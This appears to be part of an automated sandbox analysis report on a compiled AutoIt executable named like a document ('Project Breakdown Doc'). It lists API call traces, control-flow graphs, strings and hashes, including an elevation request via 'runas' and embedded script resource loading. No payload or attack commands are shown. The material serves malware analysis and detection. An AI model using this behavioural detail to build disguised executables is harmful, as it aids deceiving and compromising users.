                                                  • MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,00CF93F0,00000010), ref: 00C7D4BC
                                                  • SetCurrentDirectoryW.KERNEL32(?,00D062F8,?,?,?), ref: 00C7D4F4
                                                  • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00CF5D40,00D062F8,?,?,?), ref: 00C7D57A
                                                  • ShellExecuteW.SHELL32(00000000,?,?), ref: 00C7D581
                                                    • Part of subcall function 00C43A58: GetSysColorBrush.USER32(0000000F), ref: 00C43A62
                                                    • Part of subcall function 00C43A58: LoadCursorW.USER32(00000000,00007F00), ref: 00C43A71
                                                    • Part of subcall function 00C43A58: LoadIconW.USER32(00000063), ref: 00C43A88
                                                    • Part of subcall function 00C43A58: LoadIconW.USER32(000000A4), ref: 00C43A9A
                                                    • Part of subcall function 00C43A58: LoadIconW.USER32(000000A2), ref: 00C43AAC
                                                    • Part of subcall function 00C43A58: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00C43AD2
                                                    • Part of subcall function 00C43A58: RegisterClassExW.USER32(?), ref: 00C43B28
                                                    • Part of subcall function 00C439E7: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,rrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrr,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00C43A15
                                                    • Part of subcall function 00C439E7: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00C43A36
                                                    • Part of subcall function 00C439E7: ShowWindow.USER32(00000000,?,?), ref: 00C43A4A
                                                    • Part of subcall function 00C439E7: ShowWindow.USER32(00000000,?,?), ref: 00C43A53
                                                    • Part of subcall function 00C443DB: _memset.LIBCMT ref: 00C44401
                                                    • Part of subcall function 00C443DB: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00C444A6
                                                  Strings
                                                  • This is a third-party compiled AutoIt script., xrefs: 00C7D4B4
                                                  • runas, xrefs: 00C7D575
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
                                                  • String ID: This is a third-party compiled AutoIt script.$runas
                                                  • API String ID: 529118366-3287110873
                                                  • Opcode ID: b2d9f72e7598283df7283360799cf09251cfa6f3ee0afedd38d917f9e7f047ee
                                                  • Instruction ID: 633c7077bc0483c5aebe509b2aff81406fd7682ad2ac50276ebd5b1eed157367
                                                  • Opcode Fuzzy Hash: b2d9f72e7598283df7283360799cf09251cfa6f3ee0afedd38d917f9e7f047ee
                                                  • Instruction Fuzzy Hash: 8F51E230D04289AECF11ABB4DC45FFD7B79BF44300F044269F86AA62A1CB709656EB35
                                                  Function 00C44AFE Relevance: 10.7, APIs: 7, Instructions: 223COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 997 c44afe-c44b5e call c477c7 GetVersionExW call c47d2c 1002 c44b64 997->1002 1003 c44c69-c44c6b 997->1003 1005 c44b67-c44b6c 1002->1005 1004 c7db90-c7db9c 1003->1004 1006 c7db9d-c7dba1 1004->1006 1007 c44c70-c44c71 1005->1007 1008 c44b72 1005->1008 1010 c7dba4-c7dbb0 1006->1010 1011 c7dba3 1006->1011 1009 c44b73-c44baa call c47e8c call c47886 1007->1009 1008->1009 1019 c44bb0-c44bb1 1009->1019 1020 c7dc8d-c7dc90 1009->1020 1010->1006 1013 c7dbb2-c7dbb7 1010->1013 1011->1010 1013->1005 1015 c7dbbd-c7dbc4 1013->1015 1015->1004 1017 c7dbc6 1015->1017 1021 c7dbcb-c7dbce 1017->1021 1019->1021 1022 c44bb7-c44bc2 1019->1022 1023 c7dc92 1020->1023 1024 c7dca9-c7dcad 1020->1024 1025 c7dbd4-c7dbf2 1021->1025 1026 c44bf1-c44c08 GetCurrentProcess IsWow64Process 1021->1026 1027 c7dc13-c7dc19 1022->1027 1028 c44bc8-c44bca 1022->1028 1029 c7dc95 1023->1029 1031 c7dcaf-c7dcb8 1024->1031 1032 c7dc98-c7dca1 1024->1032 1025->1026 1030 c7dbf8-c7dbfe 1025->1030 1033 c44c0d-c44c1e 1026->1033 1034 c44c0a 1026->1034 1039 c7dc23-c7dc29 1027->1039 1040 c7dc1b-c7dc1e 1027->1040 1035 c44bd0-c44bd3 1028->1035 1036 c7dc2e-c7dc3a 1028->1036 1029->1032 1037 c7dc00-c7dc03 1030->1037 1038 c7dc08-c7dc0e 1030->1038 1031->1029 1041 c7dcba-c7dcbd 1031->1041 1032->1024 1042 c44c20-c44c30 call c44c95 1033->1042 1043 c44c89-c44c93 GetSystemInfo 1033->1043 1034->1033 1044 c7dc5a-c7dc5d 1035->1044 1045 c44bd9-c44be8 1035->1045 1047 c7dc44-c7dc4a 1036->1047 1048 c7dc3c-c7dc3f 1036->1048 1037->1026 1038->1026 1039->1026 1040->1026 1041->1032 1054 c44c32-c44c3f call c44c95 1042->1054 1055 c44c7d-c44c87 GetSystemInfo 1042->1055 1046 c44c56-c44c66 1043->1046 1044->1026 1050 c7dc63-c7dc78 1044->1050 1051 c7dc4f-c7dc55 1045->1051 1052 c44bee 1045->1052 1047->1026 1048->1026 1056 c7dc82-c7dc88 1050->1056 1057 c7dc7a-c7dc7d 1050->1057 1051->1026 1052->1026 1062 c44c76-c44c7b 1054->1062 1063 c44c41-c44c45 GetNativeSystemInfo 1054->1063 1059 c44c47-c44c4b 1055->1059 1056->1026 1057->1026 1059->1046 1061 c44c4d-c44c50 FreeLibrary 1059->1061 1061->1046 1062->1063 1063->1059
                                                  APIs
                                                  • GetVersionExW.KERNEL32(?), ref: 00C44B2B
                                                    • Part of subcall function 00C47D2C: _memmove.LIBCMT ref: 00C47D66
                                                  • GetCurrentProcess.KERNEL32(?,00CCFAEC,00000000,00000000,?), ref: 00C44BF8
                                                  • IsWow64Process.KERNEL32(00000000), ref: 00C44BFF
                                                  • GetNativeSystemInfo.KERNELBASE(00000000), ref: 00C44C45
                                                  • FreeLibrary.KERNEL32(00000000), ref: 00C44C50
                                                  • GetSystemInfo.KERNEL32(00000000), ref: 00C44C81
                                                  • GetSystemInfo.KERNEL32(00000000), ref: 00C44C8D
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
                                                  • String ID:
                                                  • API String ID: 1986165174-0
                                                  • Opcode ID: 6f983e8a7ace0e6c6a728701af4ed3937d740014e2be8549e1a6cca876376059
                                                  • Instruction ID: 2c267985b8099c0e7193831a4a37a671cc2bdaf26dd5fe6486578007e11c0145
                                                  • Opcode Fuzzy Hash: 6f983e8a7ace0e6c6a728701af4ed3937d740014e2be8549e1a6cca876376059
                                                  • Instruction Fuzzy Hash: 3991C43154ABC0DEC735CB6885917AABFF5BF25300F588A9DD0DB93A01D220EA48D719
                                                  Function 00C44FE9 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 62COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1064 c44fe9-c45001 CreateStreamOnHGlobal 1065 c45021-c45026 1064->1065 1066 c45003-c4501a FindResourceExW 1064->1066 1067 c45020 1066->1067 1068 c7dd5c-c7dd6b LoadResource 1066->1068 1067->1065 1068->1067 1069 c7dd71-c7dd7f SizeofResource 1068->1069 1069->1067 1070 c7dd85-c7dd90 LockResource 1069->1070 1070->1067 1071 c7dd96-c7ddb4 1070->1071 1071->1067
                                                  APIs
                                                  • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,00C44EEE,?,?,00000000,00000000), ref: 00C44FF9
                                                  • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00C44EEE,?,?,00000000,00000000), ref: 00C45010
                                                  • LoadResource.KERNEL32(?,00000000,?,?,00C44EEE,?,?,00000000,00000000,?,?,?,?,?,?,00C44F8F), ref: 00C7DD60
                                                  • SizeofResource.KERNEL32(?,00000000,?,?,00C44EEE,?,?,00000000,00000000,?,?,?,?,?,?,00C44F8F), ref: 00C7DD75
                                                  • LockResource.KERNEL32(00C44EEE,?,?,00C44EEE,?,?,00000000,00000000,?,?,?,?,?,?,00C44F8F,00000000), ref: 00C7DD88
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                  • String ID: SCRIPT
                                                  • API String ID: 3051347437-3967369404
                                                  • Opcode ID: 4580c30dbbf27a386072143b624fc7ba7b586b38b75893316272f52588f9fe58
                                                  • Instruction ID: 4d5c28f04e38839be6c8d677a74c4a710cb8f7e556a2a42605f385f89a0fae61
                                                  • Opcode Fuzzy Hash: 4580c30dbbf27a386072143b624fc7ba7b586b38b75893316272f52588f9fe58
                                                  • Instruction Fuzzy Hash: 2A112A75240701AFE7258B65DC58F6B7BBEFBC9B51F20816CF41696260DB61EC018670
                                                  Function 00CA4696 Relevance: 4.5, APIs: 3, Instructions: 25fileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetFileAttributesW.KERNELBASE(?,00C7E7C1), ref: 00CA46A6
                                                  • FindFirstFileW.KERNELBASE(?,?), ref: 00CA46B7
                                                  • FindClose.KERNEL32(00000000), ref: 00CA46C7
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: FileFind$AttributesCloseFirst
                                                  • String ID:
                                                  • API String ID: 48322524-0
                                                  • Opcode ID: 5102b1a051341df1bfc0086f2dac001cbf8ad67ec2c6d66407b527c03155c5e2
                                                  • Instruction ID: 47f6af5c9ddf8a17a2c82a3380ce3a6f06b14765ea7437b01aa9505c0c2d59c7
                                                  • Opcode Fuzzy Hash: 5102b1a051341df1bfc0086f2dac001cbf8ad67ec2c6d66407b527c03155c5e2
                                                  • Instruction Fuzzy Hash: 34E0D8314108016B42146738EC4D9EE775D9E47339F100719F935C10E0E7F059518595
                                                  Function 00C4E800 Relevance: 2.4, Strings: 1, Instructions: 1102COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  • Variable must be of type 'Object'., xrefs: 00C8428C
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: Variable must be of type 'Object'.
                                                  • API String ID: 0-109567571
                                                  • Opcode ID: beb5da1290f779e42d5294626025fea62d0dc1da563e4696e5e43500e55a8ab0
                                                  • Instruction ID: 570335da1dd886cafa146b0f84a976b5d02c69634077e547e844ffcfdbd8aec4
                                                  • Opcode Fuzzy Hash: beb5da1290f779e42d5294626025fea62d0dc1da563e4696e5e43500e55a8ab0
                                                  • Instruction Fuzzy Hash: A4A2AF74E04206CFCB24DF98C480AAEB7B1FF58314F258169E916AB351D771EE42CB95
                                                  Function 00C50B30 Relevance: 57.3, APIs: 27, Strings: 5, Instructions: 1300windowsleeptimeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00C50BBB
                                                  • timeGetTime.WINMM ref: 00C50E76
                                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00C50FB3
                                                  • TranslateMessage.USER32(?), ref: 00C50FC7
                                                  • DispatchMessageW.USER32(?), ref: 00C50FD5
                                                  • Sleep.KERNEL32(0000000A), ref: 00C50FDF
                                                  • LockWindowUpdate.USER32(00000000,?,?), ref: 00C5105A
                                                  • DestroyWindow.USER32 ref: 00C51066
                                                  • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00C51080
                                                  • Sleep.KERNEL32(0000000A,?,?), ref: 00C852AD
                                                  • TranslateMessage.USER32(?), ref: 00C8608A
                                                  • DispatchMessageW.USER32(?), ref: 00C86098
                                                  • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00C860AC
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: Message$DispatchPeekSleepTranslateWindow$DestroyLockTimeUpdatetime
                                                  • String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
                                                  • API String ID: 4003667617-3242690629
                                                  • Opcode ID: ee5bff8ccd931b9afe13ad61a9769cb0ad0101111d20bee2fd4a0ebf9b47b3ab
                                                  • Instruction ID: 88f054137ea4240fcbf37a3ccfe83296161f13bd2ddd36dcf819f952d1017fda
                                                  • Opcode Fuzzy Hash: ee5bff8ccd931b9afe13ad61a9769cb0ad0101111d20bee2fd4a0ebf9b47b3ab
                                                  • Instruction Fuzzy Hash: B7B2D374608741DFD724DF24C884BAEB7E1BF84308F24491DF89987291DBB0E988DB5A
                                                  Function 00CA93DF Relevance: 19.8, APIs: 13, Instructions: 322fileCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  APIs
                                                    • Part of subcall function 00CA91E9: __time64.LIBCMT ref: 00CA91F3
                                                    • Part of subcall function 00C45045: _fseek.LIBCMT ref: 00C4505D
                                                  • __wsplitpath.LIBCMT ref: 00CA94BE
                                                    • Part of subcall function 00C6432E: __wsplitpath_helper.LIBCMT ref: 00C6436E
                                                  • _wcscpy.LIBCMT ref: 00CA94D1
                                                  • _wcscat.LIBCMT ref: 00CA94E4
                                                  • __wsplitpath.LIBCMT ref: 00CA9509
                                                  • _wcscat.LIBCMT ref: 00CA951F
                                                  • _wcscat.LIBCMT ref: 00CA9532
                                                    • Part of subcall function 00CA922F: _memmove.LIBCMT ref: 00CA9268
                                                    • Part of subcall function 00CA922F: _memmove.LIBCMT ref: 00CA9277
                                                  • _wcscmp.LIBCMT ref: 00CA9479
                                                    • Part of subcall function 00CA99BE: _wcscmp.LIBCMT ref: 00CA9AAE
                                                    • Part of subcall function 00CA99BE: _wcscmp.LIBCMT ref: 00CA9AC1
                                                  • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00CA96DC
                                                  • _wcsncpy.LIBCMT ref: 00CA974F
                                                  • DeleteFileW.KERNEL32(?,?), ref: 00CA9785
                                                  • CopyFileW.KERNELBASE(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00CA979B
                                                  • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00CA97AC
                                                  • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00CA97BE
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
                                                  • String ID:
                                                  • API String ID: 1500180987-0
                                                  • Opcode ID: 116a252f07ad7e47760798c7e4466bbab5d9038df61ce2bc8e44e7a53e5383b6
                                                  • Instruction ID: ad2bd3d9eafbcb71809d59ad5a0914485b68e4c7dd5f950051287f33147e4265
                                                  • Opcode Fuzzy Hash: 116a252f07ad7e47760798c7e4466bbab5d9038df61ce2bc8e44e7a53e5383b6
                                                  • Instruction Fuzzy Hash: 02C12BB1D00229ABDF21DFA5CC86EDEB7BDEF45314F0040AAF609E6151DB309A849F65
                                                  Function 00C43015 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 71windowregistryCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  APIs
                                                  • GetSysColorBrush.USER32(0000000F), ref: 00C43074
                                                  • RegisterClassExW.USER32(00000030), ref: 00C4309E
                                                  • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00C430AF
                                                  • InitCommonControlsEx.COMCTL32(?), ref: 00C430CC
                                                  • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00C430DC
                                                  • LoadIconW.USER32(000000A9), ref: 00C430F2
                                                  • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00C43101
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                  • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                  • API String ID: 2914291525-1005189915
                                                  • Opcode ID: 2fc21bef6b96fb6c84a6453367bc6eb5a445cc6f2d0cd7cdc9ae670fd9a2a33f
                                                  • Instruction ID: 1dd12d0c8f30cbb376a195d36a5b4cf243aebe0445ac23d7ee844aefde7a2bb5
                                                  • Opcode Fuzzy Hash: 2fc21bef6b96fb6c84a6453367bc6eb5a445cc6f2d0cd7cdc9ae670fd9a2a33f
                                                  • Instruction Fuzzy Hash: 423125B1800309EFEB509FA4E888BDDBBF1FB09710F10812EE544E62A0D7B54596CF60
                                                  Function 00C43041 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 54windowregistryCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  APIs
                                                  • GetSysColorBrush.USER32(0000000F), ref: 00C43074
                                                  • RegisterClassExW.USER32(00000030), ref: 00C4309E
                                                  • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00C430AF
                                                  • InitCommonControlsEx.COMCTL32(?), ref: 00C430CC
                                                  • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00C430DC
                                                  • LoadIconW.USER32(000000A9), ref: 00C430F2
                                                  • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00C43101
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                  • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                  • API String ID: 2914291525-1005189915
                                                  • Opcode ID: 4737120db81831dc0c46f9e2d677b81945a8400be9e6c251b0cc057f19e65d06
                                                  • Instruction ID: ae8103d6fc18a0cd1c5d262bc5c95b9c51d1b23071dc905c439610ec7b697047
                                                  • Opcode Fuzzy Hash: 4737120db81831dc0c46f9e2d677b81945a8400be9e6c251b0cc057f19e65d06
                                                  • Instruction Fuzzy Hash: FE21C3B1900318AFDB00DFA4E889B9DBBF5FB08700F00812EFA15E63A0D7B185558FA5
                                                  Function 00C471EB Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201registryCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  APIs
                                                    • Part of subcall function 00C44864: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00D062F8,?,00C437C0,?), ref: 00C44882
                                                    • Part of subcall function 00C6074F: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,00C472C5), ref: 00C60771
                                                  • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 00C47308
                                                  • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00C7ECF1
                                                  • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00C7ED32
                                                  • RegCloseKey.ADVAPI32(?), ref: 00C7ED70
                                                  • _wcscat.LIBCMT ref: 00C7EDC9
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
                                                  • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                  • API String ID: 2673923337-2727554177
                                                  • Opcode ID: 0ec725b0a07bf8a2e84d005d3a52cc0a70fd02cfd0a9fe7912b8591903380353
                                                  • Instruction ID: 1fa60e57afbdd4f00e91a19fcd79f5217c5d572553e5218e0c1405261aa49224
                                                  • Opcode Fuzzy Hash: 0ec725b0a07bf8a2e84d005d3a52cc0a70fd02cfd0a9fe7912b8591903380353
                                                  • Instruction Fuzzy Hash: D5719F718083019FC724EF65DC81AABB7E8FF58340F44452EF449C72A1EB70A948DB66
                                                  Function 00C43A58 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 71windowregistryCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  APIs
                                                  • GetSysColorBrush.USER32(0000000F), ref: 00C43A62
                                                  • LoadCursorW.USER32(00000000,00007F00), ref: 00C43A71
                                                  • LoadIconW.USER32(00000063), ref: 00C43A88
                                                  • LoadIconW.USER32(000000A4), ref: 00C43A9A
                                                  • LoadIconW.USER32(000000A2), ref: 00C43AAC
                                                  • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00C43AD2
                                                  • RegisterClassExW.USER32(?), ref: 00C43B28
                                                    • Part of subcall function 00C43041: GetSysColorBrush.USER32(0000000F), ref: 00C43074
                                                    • Part of subcall function 00C43041: RegisterClassExW.USER32(00000030), ref: 00C4309E
                                                    • Part of subcall function 00C43041: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00C430AF
                                                    • Part of subcall function 00C43041: InitCommonControlsEx.COMCTL32(?), ref: 00C430CC
                                                    • Part of subcall function 00C43041: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00C430DC
                                                    • Part of subcall function 00C43041: LoadIconW.USER32(000000A9), ref: 00C430F2
                                                    • Part of subcall function 00C43041: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00C43101
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
